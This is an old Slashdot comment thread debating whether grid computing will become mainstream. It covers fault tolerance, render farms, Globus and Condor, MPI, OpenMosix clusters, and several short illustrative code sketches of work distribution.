Anonymous Coward | more than 11 years ago | (#5952104)

Why was this modded down?

Re:grid computing... (0)

Anonymous Coward | more than 11 years ago | (#5931925)

You've managed to miss the point. Completely. If you read the IBM material and it wasn't clear, try Sun's [sun.com] material.

You're all wrong (1)

shaneb11716 (451351) | more than 11 years ago | (#5930982)

Neither this nor Social Computing is the next killer app... Social Grid Computing is.

Never mainstream (4, Insightful)

MobyDisk (75490) | more than 11 years ago | (#5931040)

This is just an inverted version of the "network computing" universe where we all use thin clients that use a central server to do work. It can never become mainstream due to the physical limitations, not the technology ones. Suppose I am a corporation and I need a new big-iron system to process daily orders from our web site. Let's try grid computing: all 1000 employees in the company install a piece of software on their PC so we can use each PC to process an order, based on availability. The number of problems with this, as compared to using a central server, is incredible.

1) Still need a central server for storage/backup
2) One server needs one UPS, 1000 workstations...
3) Workstations are flaky: They reboot, crash, play video games, etc. The distributed software can handle this, but the inefficiency involved is painstaking. I hope everybody doesn't run Windows Update all at once, or all the PCs could go down.
4) The corporate network is now a bottleneck.

I rattled off this list in about 30 seconds, so I'm sure there are lots more. Since these are physical limitations, not technology limitations, they aren't going away.

No, this can be practical for many applications (1)

Tom7 (102298) | more than 11 years ago | (#5931191)


Well, this scenario would not be appropriate, since there's hardly any processing involved in web orders. Mostly that is just database queries. But you could easily imagine that you'd see a useful speedup if you had your advertising firm's 3D animations rendering on every computer in the office, or your software development company's nightly build/regression suite. Fault tolerance (not trivial, but not impossible either) takes care of 2 and 3, so you just need to find an application that's appropriate to take care of 1 and 4.

Re:Never mainstream (1)

shepard (2304) | more than 11 years ago | (#5931658)

What is mainstream? Even if it doesn't become mainstream, does that mean it can't be "the next big thing" or be involved in useful science? The NEESgrid project [neesgrid.org] relies on creating a grid infrastructure, and the system architecture of that grid involves storage at each equipment site that is a part of that virtual organization, not (only) some central storage server. Standing up a NEESpop, a TelePresence server, or a data storage server does not require 1000 workstations, although it may require a UPS and some people to administer the servers. Sure, the architecture adds overhead, but what architectures don't, grid or otherwise? The important questions your comment doesn't address are whether the architecture solves the targeted scientific/business problems and whether the provided solutions are affordable (and hence realistic).

The point is not that the configuration you mention here is technologically infeasible. That's like saying that computer networking is doomed because one of the protocols in use on some remote part of the network is flawed. The point is that the grid has enough abstractions built into it to allow a diverse set of logical system architectures. Maybe none of these architectural plans will work, maybe all will work, but just because one architecture you enumerate here won't in your opinion work, that is not cause to dismiss offhand the entire concept of grid computing as never having applicability towards a mainstream purpose, such as enabling scientific collaboration.

Re:Never mainstream (4, Insightful)

Realistic_Dragon (655151) | more than 11 years ago | (#5931776)

3) Workstations are flaky:

_Your_ workstation may be flakey, but real workstations are not:

peu@elrsr-4 peu $ uptime
19:33:50 up 140 days, 2:01, 3 users, load average: 0.26, 0.26, 0.14

So grid computing gives you just one more reason to move your company desktops to AIX, Linux, BSD, IRIX, or other competent operating system of your choice.

Re:Never mainstream (0)

Anonymous Coward | more than 11 years ago | (#5932192)

This has got to be a troll, albeit a clever one.

Never mainstream? Is there any real chance that hooking up hundreds or thousands of computers in a grid could be mainstream anyway? It may become common in universities, in some sectors of the Fortune 5000, or in certain industries, but it's not anything that will be in the Mom & Pop shops that constitute a large percentage of our economy, except as something like seti@home.

This is just an inverted version of the "network computing" universe

No. There is no requirement in grid computing to eliminate centralized servers. What it does is provide a means of making better use of existing resources. If you have to solve the types of problems suitable for grid computing, it can be a powerful tool.

The number of problems with this, as compared to using a central server, is incredible.

What is truly incredible is that you would propose doing something blatantly stupid and inappropriate with the technology (transaction processing) as a reason why it won't work. You don't try to use your microwave as a toaster, do you?

I rattled off this list in about 30 seconds

Too bad you didn't spend another 30 seconds, you might have figured out some of the advantages.

Better yet, try reading some of the background material:

IBM [ibm.com]
Sun [sun.com]

Re:Never mainstream (0)

Anonymous Coward | more than 11 years ago | (#5933508)

Grid computing already is "mainstream" in the same sense that beowulf clusters and mainframes are mainstream. It's not intended to be a panacea as your contrived example suggests. It's a useful technology for organizations that have computationally demanding workloads and available compute power. (Instead of database, think simulation.)

Now lets take a look at your objections:

1) Still need a central server for storage/backup

So your 1st point is a wash.

2) One server needs one UPS, 1000 workstations...

In your example you are trying to replace a mainframe (let's ballpark it at $1,000,000 - a little low, but...) and you quibble at spending what, $50k? To increase the availability of your critical resources?

Score: -1

3) Workstations are flaky: They reboot, crash, play video games, etc. The distributed software can handle this, but the inefficiency involved is painstaking. I hope everybody doesn't run Windows Update all at once, or all the PCs could go down.

So you have no control over the "workstations" that you use? At all? Crashing? GAMES? Random windows updates? WINDOWS!! (That last one explains a lot.)

Score: -1

4) The corporate network is now a bottleneck.

So you did nothing to architect the network for the workload? While trying to save $1,000,000?

Score: -1

Bonus issue: Suggesting grid computing for transaction processing?

Score: -1

The fact that you suggest using grid computing for transaction processing demonstrates that you have no understanding of what grid computing is really about. Next time, instead of spending 30 seconds brainstorming about the problems of a technology that you have no understanding of, you would greatly benefit from spending at least 3 minutes reading about it.

Re:Never mainstream (2, Insightful)

2short (466733) | more than 11 years ago | (#5940920)

You obviously rattled that off in 30 seconds, since you didn't think about it much. Suppose you need a new big iron system for order processing? Sorry, I can't coherently imagine that; order processing just isn't a big deal. Let's assume we're talking instead about a task that would require a big machine, and look at your concerns:

1) Still need a central server for storage/backup

There might be interesting applications of grid computing for distributed, redundant storage, but the classic applications would be oriented toward massing processor power, not storage.

2) One server needs one UPS, 1000 workstations...

Well, I've got a UPS on my workstation anyway, but even if you don't this is just one variation of:

3) Workstations are flaky...

One workstation is flaky. A couple thousand are rock-solid, if your grid software is any good at all. You hope everybody doesn't run Windows Update (or do some other maintenance) all at once? That seems pretty unlikely, and in any case I hope you don't ever do maintenance on your single server, since it will obviously be all at once.
I actually worked somewhere that used a "grid"-like technique for animation rendering. Every workstation had a background app running. If your machine was idle for a little while, this app would start up, ask the "NetRender" machine for a frame, and get to work. If it finished the frame it would send it in and ask for another. If it didn't (you came back from lunch, a janitor yanked out the power cord, whatever), NetRender didn't care. Once it had passed out all the frames in an animation, it would just start again at the beginning, passing out the ones it hadn't gotten back. Was there "painstaking inefficiency"? Well, at the end of rendering the last job set up for a particular night, almost every machine in the shop was presumably racing to finish the same frame, but who cares? They weren't doing anything else anyway. (Actually, I think NetRender had some further intelligence so it didn't pass out the same frame more than X times a minute.) A rough sketch of this pull scheme follows at the end of this comment.

4) The corporate network is now a bottleneck
Something is always the bottleneck. A good way to decide whether grid computing is appropriate to a task is to ask whether your statement sounds like a pro or a con.
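
(A rough, in-process sketch of the pull-based NetRender scheme described above; all names are invented and a real implementation obviously spreads the work across many machines. The coordinator just keeps re-issuing frames it hasn't received, so a flaky workstation costs nothing but a little duplicated effort.)

import random

class Coordinator:
    """Hands out frame numbers until every frame has been returned."""
    def __init__(self, frames):
        self.pending = set(frames)

    def get_frame(self):
        # hand out any frame not yet returned, even one someone else is already on
        return min(self.pending) if self.pending else None

    def put_frame(self, frame):
        self.pending.discard(frame)

coord = Coordinator(range(100))
while (frame := coord.get_frame()) is not None:
    if random.random() < 0.1:    # workstation rebooted, janitor pulled the plug...
        continue                 # nobody cares; the frame just gets handed out again
    coord.put_frame(frame)       # frame rendered and sent back
print("all frames rendered")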

Re:Never mainstream (1)

sipy (602638) | more than 11 years ago | (#5941448)

Let's confront Deutsch's Seven Fallacies of the Network:

1: The Network is reliable
2: Latency is zero
3: Bandwidth is infinite
4: The Network is secure
5: Topology doesn't change
6: There is one administrator
7: Transport cost is zero

Grid computing addresses 1, 4, and 7 IMHO, yet leaves 2 and 3 unsolved. Since you can't even solve the "infinite bandwidth" issue with Grid computing, I submit that "Grid Computing" isn't The Last Word (tm) on computing...

Maybe a bit long in the tooth already... (1, Interesting)

Anonymous Coward | more than 11 years ago | (#5931058)

Six years ago we were clamoring to use the desktops on the trading floor to run some of our financial models at night. We tried MPI and CORBA, and kludged together a workable (although lacking) solution. I can definitely see where a hodgepodge solution like that needs to be improved, and it looks like the grid concept is looking to fill that gap, but at the same time the desktop is evolving. The Net PC seems to have gone the way of the dodo, and while it is true that there are plenty of idle desktops during the evening, I would say most of the servers are well utilized by the departments.

The real benefit would be pulling in all that desktop power, but I do not believe desktops will remain as they are. With mobile work forces and reshaped IT departments, workers are more likely to move about the company and form resource pools. In order to do that, they will need to be productive as soon as they set up shop with a new team. Current infrastructure makes that difficult to manage. The more successful implementations have those workers using laptops, which go home at night. Goodbye spare cycles. Future concepts seem to be brewing where you leave the peripherals and just carry around a small PDA-size CPU+storage unit and plug that in at any station, and you're set to go. In that scenario the spare cycles are walking around with you. I only see limited use for consolidating existing server processing. There are already plenty of technologies that address that need. Not sure I buy this as "the next thing", but I guess it's the next short-term thing, maybe.


10,000-foot view? (0, Offtopic)

tagishsimon (175038) | more than 11 years ago | (#5931089)

10,000-foot view? What was wrong with the last cruddy neogism, helicopter view, or, heaven forefend, an overview? Still. I'm quite happy to run it up the old flagpole and see if anyone salutes it.

Re:10,000-foot view? (0)

Anonymous Coward | more than 11 years ago | (#5931143)

tagishsimon wrote "cruddy neogism"

Did you mean "cruddy neologism"? If the former was intended as one of the latter, I blush to think of what you meant.

Software Architectures for Grid Computing (3, Interesting)

Jack William Bell (84469) | more than 11 years ago | (#5931141)

I have given a lot of thought to this concept in the past and, although I think it has a lot of merit, I also think it will require a different underlying software architecture than any of those we use today.

Currently for distributed computing we have Thin-Client/Fat-Server, Client/Server, N-Tier and Shared-Node architectures. I think most people are expecting a Shared-Node or Client/Server for Grid Computing because that is how existing implementations work. The issue with either of those is the size of the work unit. If the work unit is small, then the nodes/clients must synchronize often. If the work unit is large, then you are more likely to have nodes/clients in a wait state because required processing is not completed.

Using a network-style architecture (distributed Shared-Node) raises more issues because of message routing. Interestingly, this is the 'web-service' model! For example, a web site must verify a customer, charge her credit card, initiate a shipping action and order from a factory in a single transaction. So you get four sub-transactions. Let's say that each of those initiates two sub-transactions of its own, and each of those initiates one sub-transaction of its own. We now have a total of twenty transactions in a hierarchy that is three deep. Let's also assume that we only have one dependency (the verification) before launching all other transactions asynchronously.

The problem here is response times; they add up. If the average response time is 500 ms, then three transactions deep gives us 1500 ms. The dependency, at a minimum, doubles this. So it takes three full seconds to commit the transaction. That is something a user might be willing to live with, until a netstorm occurs and the response time climbs to thirty seconds or more. (Note: isn't it funny how you never see this math done in the whitepapers pushing web services?) But three seconds is far too long for synchronizing between nodes of a distributed computing grid, unless you only have to do it once in a great while, pushing us towards large work units and idle nodes!

So the Internet itself imposes costs on a distributed model that wouldn't exist on, say, a Beowulf cluster because that cluster would have a dedicated high-speed network. Client/Server architectures work better for the Internet, but require dedicated servers and a lot of bandwidth to and from them.

I believe the real answer lies in what I call a Cell architecture. This would require servers, but their job would be to hook up nodes into computing 'cells' consisting of one to N (where N is less than 256?) nodes. Each node would download a work-unit from the server appropriately sized to the cell, along with net addresses of the other nodes in the cell. Communication would occur between the nodes until the computation is complete and then the result would be sent back to the server. When a node completes its work unit (even if all computation for the cell is not complete) it detaches and contacts the server for another cell assignment.

By reducing cross-talk to direct contact between nodes within the cell we allow smaller work units. By using a server to coordinate nodes into cells we are allowed to treat the cells as larger virtual work units.
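
(A rough sketch of the cell idea in a few lines of Python, purely illustrative: the server only forms cells and sizes the work units; the nodes would then talk directly to their cell-mates rather than back through the server.)

from dataclasses import dataclass

MAX_CELL = 8    # keep cells small so intra-cell chatter stays cheap

@dataclass
class Cell:
    nodes: list        # addresses of the nodes cooperating on one work unit
    work_unit: range   # the slice of the overall job assigned to this cell

def form_cells(node_addresses, total_items):
    cells, start = [], 0
    for i in range(0, len(node_addresses), MAX_CELL):
        members = node_addresses[i:i + MAX_CELL]
        # size the unit to the cell: more nodes, bigger slice
        size = total_items * len(members) // len(node_addresses)
        cells.append(Cell(members, range(start, start + size)))
        start += size
    return cells

for cell in form_cells([f"node{i}" for i in range(20)], total_items=10_000):
    print(len(cell.nodes), "nodes get items", cell.work_unit)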

Comments?

This is how things like Globus and Condor work (1)

chivo (20329) | more than 11 years ago | (#5931425)

Having done some work with Globus and Condor, it seems that your "cell architecture" is basically how things are set up now. Many institutions, like the group at the University of Illinois at Urbana-Champaign and the National Center for Supercomputing Applications (NCSA), have set up Grid nodes using toolkits and programs like Globus.

If you have an app which is Grid-enabled, a hydrology simulation for instance, you would get accounts on the various NCSA Grid nodes. Then you would use Globus or Condor, or the two in combination, to hand off your computation and data to the various Grid nodes; the nodes would compute, then give you back results. Your own computing cluster/Grid node could work on the results, have other nodes do more computing, and so on until finished.
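For the Condor half of that, the hand-off is essentially just a submit description file given to condor_submit. The sketch below (Python, generating a minimal submit file) uses entirely made-up names -- hydro_sim, the region argument and the file names are hypothetical, and a real job would likely need extra attributes for file transfer and requirements:

    # Hypothetical hand-off: write a minimal Condor submit description and submit it.
    import subprocess, textwrap

    submit = textwrap.dedent("""\
        universe   = vanilla
        executable = hydro_sim
        arguments  = --region 42
        output     = hydro_42.out
        error      = hydro_42.err
        log        = hydro_42.log
        queue
    """)
    with open("hydro.sub", "w") as f:
        f.write(submit)

    # condor_submit is the standard Condor client command; Condor then finds
    # an idle node, runs the job there, and ships the output files back.
    subprocess.run(["condor_submit", "hydro.sub"], check=True)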

This reduces communication over the Internet and keeps most communication on local networks. However, even if you did want to do communication between nodes, it wouldn't be as bad as you point out. Most nodes are at universities that are on Internet2 and have huge amounts of bandwidth available, with low latency.

Commercial uses of Grid computing may differ as they will have difficulty using I2 or something like NCSA, but I'm sure the market will fix this problem.

My $.02 at least.

Just 10000 feet? Bah! (4, Funny)

arvindn (542080) | more than 11 years ago | (#5931195)

They're talking about the grid being distributed across the globe... what kind of a view can you get from 10000 ft?

;^)

what kind of distance is that? about 2 miles? (1)

fantomas (94850) | more than 11 years ago | (#5935311)

ummm, 5280 feet to a mile, so that's "Grid Computing: the view from just under two miles" :-)

Can you give that in metric for us euros ;-) ?


in other words... (1)

rhyd (614491) | more than 11 years ago | (#5931213)

..."The network is the computer" but IBM couldn't bring themselves to use that phrase.

Some companies have a "not invented here" problem with stuff, but not IBM: Java, Linux, Cell, J2EE. Is there anything more substantial to IBM than a marketing department and two factories (one to make models of factories and the other churning out hard disks designed to fry after 24hrs of continuous use)?

Why doesn't IBM just "show Sun the money" so they can get it on

Some problems. (3, Interesting)

Duncan3 (10537) | more than 11 years ago | (#5931384)

First off, this stuff has been completely mainstream for over 30 years now. The only thing new is that it keeps getting renamed; this year it's called GRID. I remember when it was called timesharing, and Time magazine had cartoons depicting it in 1973.

The entire GRID standard actually only covers data transfer and login, because that's the only thing standard about the different types of hardware. You still need to write the software specific to the hardware. Even with tools like MPI, programming for Sun big iron is nothing at all like programming for IBM big iron. And you don't exactly use Java. The value is not in the software - that's why it's getting standardized and given away for free. The value, as always, is in owning a huge pool of computing power and renting it out, or even better, selling it in racks full.

The only people benefiting financially are the people that make the hardware - IBM, HP, Sun, Fujitsu, etc. Just like 30 years ago. Open Source has completely devalued the software - why pay for that when the money is better spent on more hardware?

Then there is the cost of transporting the terabytes of data involved in the types of problems you run on these systems. Transport costs are more than the computing costs in many cases - another reason that part got standardized.

Hardware costs are falling FAST. Blade-mounted and racked CPUs are running about $500/GHz (versus about $7k for the same from IBM). That means for about a million dollars you can get something like 2K CPUs and 2 THz of aggregate clock, running Linux and all the tools you need. That's a lot of FLOPS.
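As a quick sanity check on those figures (the $500/GHz price and the roughly 1 GHz-per-CPU average are the post's own numbers, not measurements), the arithmetic works out as follows:

    budget_usd  = 1_000_000
    usd_per_ghz = 500
    ghz_per_cpu = 1.0                       # assumed average clock per blade CPU

    total_ghz  = budget_usd / usd_per_ghz   # 2000 GHz, i.e. 2 THz
    total_cpus = total_ghz / ghz_per_cpu    # roughly 2000 CPUs
    print(total_ghz, total_cpus)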

For those kinds of costs, outsourcing it seems silly. You still have to do all the software development, data transport, post-processing, and research yourself anyway, and those costs DWARF the hardware/electricity/HVAC costs of owning the hardware and having exclusive access 24/7 until the next upgrade.

How about the 10-inch view? (2, Interesting)

pla (258480) | more than 11 years ago | (#5931407)

I've seen entirely too many articles (such as one that recently appeared in SciAm, and now this one on /.'s FP) giving the "10,000-foot view" of grid computing.

I've seen a few articles giving the 10-micron view, describing CPU architectures making use of a grid topology.

I've seen a few small demos of massively distributed clusters. I've heard hype about the idea of a service provider and service consumer oriented topology. I've heard about self-healing networks. I've heard about the PS3 making use of a grid-based system.

I have not heard any of the "step 2s", the means by which we transition from individual PCs accessing a network, to a single shared "grid computer" actually composed of the network. At least, nothing that would make the resulting network noticeably different than the current internet.

For individual systems (a la the PS3), grid computing seems like possibly the next big thing, sort of an evolution of SMP to a scale larger than dual/quad-CPU systems. The rest of it, the over-hyped massive "revolution" in how people use computing resources in general? Pure marketing hot air, and nothing more. The closest we'll get to the idea of a worldwide "grid" will be an XBox-like home media console with anything-on-demand (for a fee).

Good for CPU bound processes only (4, Informative)

stanwirth (621074) | more than 11 years ago | (#5931700)

As we discovered early on in MIMD parallel computing, MIMD (aka grid computing) parallelism can only really help processes that are CPU bound in the first place.

Most of the processes that require 'big iron' are memory bound and I/O bound--e.g. databases that are hundreds of gigabytes to terabytes in size. This is why so many CPUs are '90% idle' in the first place, and this is why system designers devote more attention to bit-striping their disks, a good RAID controller, bus speeds, disk seek time and so forth.

Problems that require brute-force computation on small amounts of data, and produce small results, are simply few and far between -- and the people addressing those problems have been onto MIMD for decades. For instance, my first publication, in the 1987 USENIX UNIX on Supercomputers proceedings, involved wrapping ODE solvers in Sun RPC so that hundreds of servers could each work on a different part of initial-condition and boundary-condition space, to provide a complete picture of the properties of certain nonlinear ordinary differential equations. Cryptanalysis and protein-folding problems are already being addressed in a similar manner, and the tools to distribute these services, as well as the required communications standards, have been around for more than a decade.
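That kind of embarrassingly parallel sweep over initial conditions is easy to express with MPI today. Here is a minimal sketch using mpi4py; the toy ODE, the step count and the parameter range are all made up for illustration and are not from the publication mentioned above:

    # Run with e.g.: mpiexec -n 8 python sweep.py
    # Each rank integrates the same toy ODE from a different initial condition;
    # rank 0 gathers the endpoints. Only the final gather() crosses the network.
    from mpi4py import MPI

    comm = MPI.COMM_WORLD
    rank, size = comm.Get_rank(), comm.Get_size()

    def integrate(x0, dt=0.001, steps=10_000):
        """Forward-Euler on dx/dt = x - x**3 (an arbitrary nonlinear ODE)."""
        x = x0
        for _ in range(steps):
            x += dt * (x - x**3)
        return x

    x0 = -2.0 + 4.0 * rank / max(size - 1, 1)   # this rank's slice of IC space
    result = integrate(x0)

    results = comm.gather((x0, result), root=0)
    if rank == 0:
        for ic, end in results:
            print(f"x0={ic:+.3f} -> x(T)={end:+.6f}")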

Furthermore, if you've already got a marginally communications-bound domain decomposition of a parallel problem, and you want to cut down the communications overhead in order to take advantage of MIMD parallelism, the last communications protocol you're going to use is a high-overhead one such as CORBA, or a text-based message protocol such as XML. Both XDR and MPI are faster, more stable and better established in the scientific computing community than Yet Another layer of MIMD middleware--which is all Grid Computing is.

Re:Good for CPU bound processes only (0)

Anonymous Coward | more than 11 years ago | (#5933262)

From far back in the pews, maybe even the balcony...

"AMEN"

Thank you for the well-written synopsis of the design issues I worry about day in and day out when trying to figure out at what level to parallelize projects. This isn't to say GRID is bad. In its place, GRID can be good. Its place, however, is rather limited.

clustering daydream (1)

paraleet (650112) | more than 11 years ago | (#5931767)

I had to laugh while reading this article. I'd never heard of Grid computing before. However, about a month ago, while sitting on the can just after setting up my first cluster using OpenMosix, I had a very similar idea. Given a worldwide fibre network, systems similar to distributed.net could be set up, but simply to share idle processor cycles, with the hope that when you occasionally run local computations that red-line your processor, the offending processes could be sent out to the distributed cluster you are a member of. Sort of like P2P processor sharing. Of course, someone would have to write a kernel-level, dynamic-memory-allocation-capable clustering thang. That definitely wouldn't be fun. Especially in Win32.

TeraGrid (3, Interesting)

kst (168867) | more than 11 years ago | (#5931804)

Here [teragrid.org] is a large Grid project that I'm working on.

They did this at squaresoft during FF the movie (1, Interesting)

sh2kwave (310977) | more than 11 years ago | (#5931920)

From what I understand, they did this at Squaresoft during the making of the Final Fantasy movie. Idle cycles were used for rendering during the day when a CPU was not floored at 100% usage, at least according to the articles I read about it. The workstations were also tied to the dedicated render farm at night. Since many of the artists had more than one machine at their desk, it probably worked out well both at night and during the day.

Re:They did this at squaresoft during FF the movie (1)

taradfong (311185) | more than 11 years ago | (#5936780)

Rendering works great for Grid, because rendering requires very little communication per processing cycle. Other apps, like fluid flow analysis and such, require computing nodes to do a lot of talking per computational cycle, making them unsuitable for grid.

User moderation!! (2, Interesting)

corvi42 (235814) | more than 11 years ago | (#5932136)

How 'bout this - build in a system whereby users who have downloaded a file can mod its quality up or down. Then, while searching the network, you also get MD5s for the files, and the associated rating is accumulated from the other users you query. This way crappy files float to the bottom.
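A bare-bones sketch of that accumulation step (Python; the MD5 keying matches the post, but the +1/-1 vote scheme and the scoring formula are my own assumptions about what "mod up or down" would mean):

    import hashlib
    from collections import defaultdict

    # Rating totals keyed by the file's MD5, merged from whoever answers a search.
    ratings = defaultdict(lambda: {"up": 0, "down": 0})

    def file_key(data: bytes) -> str:
        """Identify a file by content, not name, so renames can't dodge bad ratings."""
        return hashlib.md5(data).hexdigest()

    def merge_peer_votes(md5: str, up: int, down: int):
        """Fold one peer's reported votes into our running total."""
        ratings[md5]["up"] += up
        ratings[md5]["down"] += down

    def score(md5: str) -> float:
        r = ratings[md5]
        total = r["up"] + r["down"]
        return 0.0 if total == 0 else (r["up"] - r["down"]) / total

    # Example: two peers report votes on the same (hypothetical) file.
    key = file_key(b"fake file contents")
    merge_peer_votes(key, up=12, down=1)
    merge_peer_votes(key, up=3, down=4)
    print(score(key))   # crappy files trend toward -1, good ones toward +1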

Hell yes I want that. (1)

mrmeval (662166) | more than 11 years ago | (#5932380)

I would love a distributed Beowulf cluster; there are several projects I need it for.

The only problems with distributing internal stuff to external machines are trust and, better still, deniability.

So ripping and compressing 1000 DVDs, or 1 million MP3s at better quality, is probably not a good idea unless there is some method to cloak what is happening.

GridShell Expert System User Interface (2, Interesting)

Will the Chill (78436) | more than 11 years ago | (#5932465)

I've been writing (partially for my CompSci Masters thesis) a new Grid-oriented application that may be of interest. It's called GridShell, and it aims to provide a Free/OSS interface to any and all Grid technologies. Currently, GridShell's skinnable web-based UI (WebUI) is almost complete, able to provide the equivalent of an expert Grid administrator/user through a very "clicky-clicky" frontend.

Oh, and it's all 100% Object-Oriented Perl, for those of you who care about clean code.

More really crazy GridShell modules are down the road, so check it out!

http://www.gridshell.org [gridshell.org]

-Will the Chill

Re:GridShell Expert System User Interface (1)

David Gould (4938) | more than 11 years ago | (#5975074)


Oh, and it's all 100% Object-Oriented Perl, for those of you who care about clean code.

I want to say something here, but I can't quite find the words.

*Wanders off, muttering...*
"Perl ... clean code ... WTF? ... "
"..."
"Perl? ... clean code?? ... WTF!!! ... "
"..."
*...shakes head in confused amazement*

(It does sound like a fascinating project and all, it's just that I've never heard those two terms associated that way before.)

Service based computing. (1)

Moderation abuser (184013) | more than 11 years ago | (#5932600)

We're using it to create a highly available, highly scalable, easy-to-manage, high-performance service broker system.

The user says "I want service blah"; the service broker decides where to run the blah application. You can kill loads of machines and the service continues to exist on the network.
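A toy version of that brokering logic, just to make the idea concrete (Python; the node names, the round-robin placement and the lack of any real health checking are all invented here and are not necessarily how the poster's system works):

    import itertools

    class ServiceBroker:
        """Maps a service name to some live node; survives node failures."""

        def __init__(self, nodes):
            self.nodes = set(nodes)          # machines currently alive
            self._rr = itertools.cycle(sorted(self.nodes))
            self.placements = {}             # service name -> node

        def kill(self, node):
            """Simulate a machine dying; its services get re-placed on demand."""
            self.nodes.discard(node)
            self._rr = itertools.cycle(sorted(self.nodes))
            self.placements = {s: n for s, n in self.placements.items() if n != node}

        def locate(self, service):
            """Return a node running the service, placing it somewhere if needed."""
            if service not in self.placements:
                self.placements[service] = next(self._rr)
            return self.placements[service]

    broker = ServiceBroker(["node1", "node2", "node3"])
    print(broker.locate("blah"))        # placed on some node
    broker.kill(broker.locate("blah"))  # that machine dies
    print(broker.locate("blah"))        # transparently re-placed on a survivor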

Oh, not again.... (1)

deanj (519759) | more than 11 years ago | (#5933018)

Grid computing has been the "next big thing" for the last (at least) five years.

First it was Globus... now companies have latched on that whole idea, hoping it'll be "the thing".

And you know what? It's not.

There are two points to all this:

The people who are already involved with this have already declared victory, and are going to keep working towards it whether it's going to work or not. After five years of pushing it, you'd think they'd get the idea that people just aren't buying into it... at least not on the scale they think people will. Five years from now, we'll be getting posts from some group of poor /.-ers who are forced to maintain all this stuff, while everyone else has long since moved on.

The second point is, don't believe anyone that says "it's the next big thing". The "next big thing" is going to be something that just sneaks up on everyone, the way Mosaic and Netscape did back in the mid-90s. It wasn't "the next big thing" until it was ALREADY "the big thing".

more detailed info (2, Interesting)

elchuppa (602031) | more than 11 years ago | (#5933087)

Grid computing is pretty interesting. If anybody wants to find out more, I have compiled a comprehensive list of references on the subject, as well as a brief (20-page or so) overview of the available Grid solutions: www.netinvasions.com/files/GRID/grid-paper.htm

OpenMosix and COWs (2, Informative)

dargaud (518470) | more than 11 years ago | (#5936616)

Many earlier posts have pointed out that there are already several ways to do this without adding an extra layer. One way which works well on an intranet is a cluster of workstations (COW) running Linux+OpenMosix [sourceforge.net].

I do software and sysadmin for scientists. Those with simulation or data analysis needs usually work either:

  • connecting remotely to a main computer (say, an SGI in many cases) to run their jobs, at a high price for hardware and support, and at the risk of saturating the machine when everyone wants in;
  • or, with the more recent increase in PC computing power, running directly on their own PCs.

In both cases the PCs are underutilized most of the time. OpenMosix is a patch to the Linux kernel that lets you transform your workstations into a cluster. No software modification is necessary; OpenMosix balances the load automagically. No more expensive mainframe. No more powerful but underutilized PCs.

OpenMosix has been featured on /. before: here [slashdot.org], here [slashdot.org], here [slashdot.org], and here [slashdot.org].
